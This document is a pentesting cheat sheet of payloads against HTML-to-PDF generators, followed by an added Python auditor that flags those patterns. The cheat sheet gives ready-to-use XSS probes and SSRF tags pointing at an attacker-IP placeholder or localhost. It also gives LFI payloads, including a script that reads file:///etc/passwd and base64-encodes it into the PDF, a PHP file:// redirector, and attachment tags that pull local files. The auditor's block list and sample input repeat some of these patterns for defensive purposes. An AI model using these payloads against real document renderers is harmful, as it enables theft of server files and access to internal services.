Identifying the PDF generation library
exiftool file.pdf
pdfinfo file.pdf
<script>document.write('test')</script>
<script>document.write(window.location)</script>
Server-side request forgery (SSRF)
<img src="http://<attacker-IP-address>/test"/>
<link rel="stylesheet" href="http://<attacker-IP-address>/test"/>
<iframe src="http://<attacker-IP-address>/test"></iframe>
<iframe src="http://127.0.0.1:80/api/" width="800" height="400"></iframe>
Local file inclusion (LFI)
With JavaScript execution.
<script>
function addNewLines(str) {
    var result = '';
    while (str.length > 0) {
        result += str.substring(0, 100) + '\n';
        str = str.substring(100);
    }
    return result;
}
x = new XMLHttpRequest();
x.onload = function(){
    document.write(addNewLines(btoa(this.responseText)))
};
x.open("GET", "file:///etc/passwd");
x.send();
</script>
Without JavaScript execution.
<iframe src="file:///etc/passwd" width="800" height="400"></iframe>
<object data="file:///etc/passwd" width="800" height="400">
<portal src="file:///etc/passwd" width="800" height="400">
Without JavaScript execution + SSRF.
<?php header('Location: file://' . $_GET['url']); ?>
<iframe src="http://<attacker-IP-address>/redirector.php?url=%2fetc%2fpasswd" width="800" height="400"></iframe>
Annotations and attachments.
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />
# PD4ML
<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>
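
A defensive counterpart to the patterns listed on this page, added here and not part of the original cheat sheet: a pre-render audit in Python that flags the elements and URL schemes shown above before markup reaches an HTML-to-PDF renderer. The allowlisted host static.example.com, the names audit and PdfInputAuditor, and the sample input are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements from this cheat sheet that run script, embed documents or attach files.
BLOCKED_TAGS = {"script", "iframe", "object", "portal", "embed",
                "annotation", "pd4ml:attachment"}
URL_ATTRS = {"src", "href", "data", "file"}
ALLOWED_HOSTS = {"static.example.com"}  # assumption: the only host assets may load from

def url_problem(value):
    """Return why the renderer must not fetch this URL, or None if it is acceptable."""
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return "scheme %r not allowed" % parts.scheme
    if (parts.hostname or "") not in ALLOWED_HOSTS:
        return "host %r not on allowlist" % parts.hostname
    return None

class PdfInputAuditor(HTMLParser):
    """Collects (tag, reason) findings for markup headed to an HTML-to-PDF renderer."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.findings.append((tag, "element not allowed"))
        for name, value in attrs:
            if name in URL_ATTRS and value is not None:
                reason = url_problem(value)
                if reason:
                    self.findings.append((tag, "%s: %s" % (name, reason)))

def audit(html):
    auditor = PdfInputAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample input: one acceptable image and two of the patterns listed above.
SAMPLE = ('<p>Invoice</p><img src="https://static.example.com/logo.png">'
          '<iframe src="file:///etc/passwd"></iframe>'
          '<img src="http://127.0.0.1:80/api/">')

if __name__ == "__main__":
    print(audit(SAMPLE))
```

The audit only sees the submitted markup; a redirect to file:// like the redirector.php case above happens at fetch time, which is why the host check is an allowlist of hosts you control rather than a blocklist.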